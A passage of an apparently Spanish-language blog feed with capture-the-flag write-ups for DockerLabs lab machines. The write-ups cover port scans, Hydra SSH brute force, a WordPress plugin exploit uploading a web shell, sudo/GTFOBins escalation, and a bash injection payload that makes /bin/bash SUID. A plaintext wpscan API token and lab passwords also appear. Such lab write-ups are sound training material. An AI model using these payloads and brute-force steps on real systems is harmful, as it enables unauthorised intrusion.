  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 22 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SSH&lt;/code&gt; y el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/28113615-2128-4be9-928d-499c0ab16257&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b873c5ab-0cba-4421-b3e0-8150f2501c57&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos tres directorios el spongebob que tiene una carpeta llamada upload y dos archivos, otro directorio llamado scripts que hay un archivo llamado put.php y otro directorio upload y el directorio revolt que no tiene nada en el directorio.&lt;/p&gt;

&lt;p&gt;Si accedemos a http://172.17.0.2/spongebob/spongebob.html hay un mensaje&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/96075985-f2e3-4486-b849-3d6bd243803f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Probamos con un ataque de descubrimento de usuarios por ssh pero no fucniona&lt;/p&gt;

&lt;p&gt;En la carpeta upload del directorio spongebob hay una imagen vamos hacerle esteganografía.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/2967ddc2-fc95-4097-889e-2ca1eb0d81ad&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que nos pedía un salvoconducto he probado los diferentes nombres que nos daba la anterior imagen y la contraseña correcta es spongebob.&lt;/p&gt;

&lt;p&gt;Nos ha extraido un zip que este también tiene contraseña vamos a usar zip2jhon&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/cd5f7777-f480-4bc5-8786-add710f772a4&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos la contraseña chocholate que es la contraseña para descomprimir el zip&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/022ac15f-4c44-4d38-b86f-1f49d758b3d6&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;En el txt tenemos la palabra aprendamos podría ser una posible contraseña vamos hacer fuerza bruta con Hydra&lt;/p&gt;

&lt;h2 id=&quot;ataque-de-fuerza-bruta-con-hydra&quot;&gt;Ataque de fuerza bruta con Hydra&lt;/h2&gt;

&lt;p&gt;Como tenemos un possible usuario, vamos hacer un ataque de fuerza bruta con Hydra al protocolo ssh de la siguiente forma:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hydra -l /usr/share/wordlists/seclists/usernames/xato-net-10-million-usernames.txt -P aprendamos ssh://172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-l&lt;/code&gt; - Para especificar el usaurio&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-P&lt;/code&gt; - Para especificar que diccionario de fuerza bruta usaremos&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh://172.17.0.2&lt;/code&gt; - Especificamos que queremos atentar contra el protocolo SSH de la IP victima&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Si esperamos un buen rato vemos que existe el usuario &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rosa&lt;/code&gt; y la contraseña es &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;aprendemos&lt;/code&gt;.&lt;/p&gt;

&lt;h2 id=&quot;intrusión&quot;&gt;Intrusión&lt;/h2&gt;

&lt;p&gt;Ahora accedemos vía SSH&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh rosa@172.17.0.2&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Si hacemos un ls vemos un directorio un tanto raro&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/62394f8e-f589-44ae-8416-9d6af06f89e2&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Y dentro de este hay muchos archivos&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/5283b50f-d0d9-4c9f-a1a1-936555ed3031&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Para buscar dentro de todas las carpetas lo haremos con el comando find, e iremos haciendo el one liner, de la forma que yo lo he hecho es la siguiente&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;find ./ &lt;span class=&quot;nt&quot;&gt;-type&lt;/span&gt; f &lt;span class=&quot;nt&quot;&gt;-exec&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;awk&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'!/x$/ {print}'&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;{}&lt;/span&gt; &lt;span class=&quot;se&quot;&gt;\;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find&lt;/code&gt; para buscar archivos y le especificamos con &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;./&lt;/code&gt; que lo busque en el directorio actual, luego limitamos la búsqueda de archivos regulares con el &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-type f, el -exec&lt;/code&gt; le dice a find que ejecute un comando en cada archivo que coincida en los criterios especificados, el &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;awk '!/x$/ {print}' {} \;&lt;/code&gt; lo que hacemos es decirle que busque las lineas acabadas en x pero como tenemos un signo de exclamación al principio niega esta condición por lo que awk selecciona las lineas que NO terminen con x, por ultimo cuando todas las reglas sean ciertas se imprimirá el resultado.&lt;/p&gt;

&lt;p&gt;Esto es prueba y error e ir afinando el comando find yo estuve un ratin hasta encontrar el one liner.&lt;/p&gt;

&lt;p&gt;Una vez hecho esto nos mostrara lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/646d3e9d-fa49-4d92-a041-0477f1cb9dc4&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si nos fijamos tenemos unas credenciales.&lt;/p&gt;

&lt;p&gt;Vamos a escalar al usuario pedro.&lt;/p&gt;

&lt;p&gt;Al pasar linpeas en la maquina por que no encontraba nada interesante vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/e517f8c9-901f-4231-a827-7b94907d4788&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;y si accedemos al directorio vemos esto&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f5d7d726-13da-4148-b6b8-3a33928654fa&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si lo decodeamos en base64 obtenemos la contraseña de juan&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/84c458d6-8125-4d91-b604-edf22783049c&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Pues parece que no que directamente tenemos que poner la contraseña en base64 ZWxwcmVzaW9uZXMK, que gracioso…&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/84103e89-fcbf-443e-84b7-505b0380563c&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si vamos al directorio de Juan vemos otro archivo oculot el ordenes_nuevas vamos a ver que hay&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ae64d1f5-b34b-4a55-bca4-a6280414a166&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tras estar buscando un buen rato y mirar todo detenidamente vemos que si usamos el comando alias que es donde podemmos abreviar comandos por medio de shortcuts esta la contraseña&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/d017c51c-7fd5-4a5b-98c0-6509921b927f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos root.&lt;/p&gt;
</description>
        <pubDate>Tue, 25 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//Herebash</link>
        <link href="https://romabri.github.io/Herebash"/>
        <guid isPermaLink="true">https://romabri.github.io/Herebash</guid>
      </item>
    
      <item>
        <title>Whoiam - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Fácil&lt;/td&gt;
      &lt;td&gt;Pylon&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/8dfcb7f8-3d49-4fae-9f9f-7b1abe3d15dc&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/84a8b820-2ea3-4df6-9e97-48ca771107bd&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/44e29cf5-223f-466d-9dfa-538db58b6238&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que ha encontrado directorios de wordpress vamos a usar la herramienta wpscan para ver si hay usuarios expuestos o plugins vulnerables.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;wpscan --api-token T4otBX3DSZb2t8OFmavP7eKxProuSUoe8YU3zd6Vrpo --url http://172.18.0.2 -e u
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/307b0902-98c7-4625-b2aa-94b717a03169&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Encontramos los usuarios &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;erik, developer&lt;/code&gt; vamos hacer un ataque de fuerza bruta a estos usuarios con la misma herramienta.&lt;/p&gt;

&lt;p&gt;Pero al estar mas de 5 minutos haciendo fuerza bruta no encontramos nada.&lt;/p&gt;

&lt;p&gt;Si nos fijamos en el escaneo de Gobuster tenemos un directorio llamado backups vamos a ver que hay ahí dentro.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/c1894155-f875-4fd2-afb6-1771b4dec268&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a descargar el archivo y ver que hay dentro.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/63c69da5-1e59-4b12-862d-fbed4c8921ba&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Nos encontramos una contraseña vamos al wp-admin a ver si funciona en el panel de login.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/99162264-7523-48bc-b350-b143cdbd910f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hemos accedido vamos a ver como podemos acceder a la máquina.&lt;/p&gt;

&lt;p&gt;En el panel de login no podemos hacer mucho vamos a mirar en el reporte del wpscan los plugins vulnerables.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/251c17e6-0900-41a5-8d0a-a344bfb4b272&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si hacemos una busqueda con la herramienta searchsploit encontramos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/39c950d1-d218-45da-9b59-052e4036178e&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a ejecutarlo&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bf7ef136-2db7-4a28-9d00-84359adf77a5&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Lo que acabamos de hacer con este script es subir una web shell&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/7b9533d9-c7f8-42a6-9aed-03f8d091474c&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;intrusión&quot;&gt;Intrusión&lt;/h2&gt;

&lt;p&gt;Vamos a mandarnos una reverse shell a nuestro equipo para poder trabajar mas comodamente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/6666507c-27f8-4e1d-a5e9-556d49abe016&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/baa29cff-d5a9-4af6-a6e0-e0edeeac53d7&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;escalada-de-privilegios&quot;&gt;Escalada de privilegios&lt;/h2&gt;

&lt;p&gt;Si hacemos un sudo -l vemos que podemos usar el binario find como el usuario rafa.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bd11d909-1c86-4c97-89a1-24346ee24a70&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Buscamos en GTFOBins y podemos escalar de la siguiente forma&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/56931e67-6c3e-4e23-bdae-a0d737634b1a&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/685fd7a0-4078-4512-b2b6-e286f886021b&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora con este usuario si hacemos sudo -l para buscar permisos vemos que podemos ejecutar el binario debugfs con el usuario ruben&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b0efb527-ac39-4e6e-a53b-46c3baa962b4&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si buscamos en GTFOBins vemos que para escalar hemos de hacer lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bf64487c-669e-4f97-a324-e0d45eb703f8&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f22bd07b-5cfa-4adb-ad3c-64cb062ed90b&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Por ultimo vemos que con el usuario ruben si hacemos un sudo -l podemos ejecutar una script como cualquier usuario vamos a ver que hace esa script y si podemos modificar-la.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/c01fb754-0fd1-4831-b536-fc9c9f1584ce&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;No tenemos permisos de modificación, vamos a ver que hace el script&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/e69aa0ae-98fb-481e-9c05-5dc691e7f455&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Este script solicita al usuario que introduzca un numero si es igual a 42 es correcto si no es incorrecto.&lt;/p&gt;

&lt;p&gt;Estuve un buen rato para ver si podía explotar el script pero no fui capaz así que mire el write up&lt;/p&gt;

&lt;p&gt;https://github.com/haw441kings/DockerLabsWriteUps/blob/main/Faciles/Whoiam.md&lt;/p&gt;

&lt;p&gt;Y vemos que para inyectar código usa la siguiente secuencia&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;a[$(chmod u+s /bin/bash &amp;gt;&amp;amp;2)]+42
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/c7804755-dff2-49f4-bef2-d345337270cc&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/9e763cba-b2ea-478e-bcd3-b3ce478218ed&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Lo que hacemos es cambiar el permiso de la bash a SUID y ejecutamos el comando bash -p para ejecutar la bash con privilegios ya hemos escalado al usuario root&lt;/p&gt;
</description>
        <pubDate>Fri, 21 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//Whoiam</link>
        <link href="https://romabri.github.io/Whoiam"/>
        <guid isPermaLink="true">https://romabri.github.io/Whoiam</guid>
      </item>
    
      <item>
        <title>Escolares - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Fácil&lt;/td&gt;
      &lt;td&gt;Luisillo_o&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/7b4dd24a-7fec-4081-8c76-b3bad573dbba&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 22 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SSH&lt;/code&gt; y el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/8285fde8-3d14-44ca-b714-eb0879d1a685&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si vamos a investigar el codigo fuente encontramos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/607c279e-15ae-420c-8eb1-5607707056e5&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/a01e424b-2bde-4f45-82df-d1c62eb76df2&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Encontramos diferentes usuario vamos anotarlos en un documento por si mas adelante nos sirven.&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
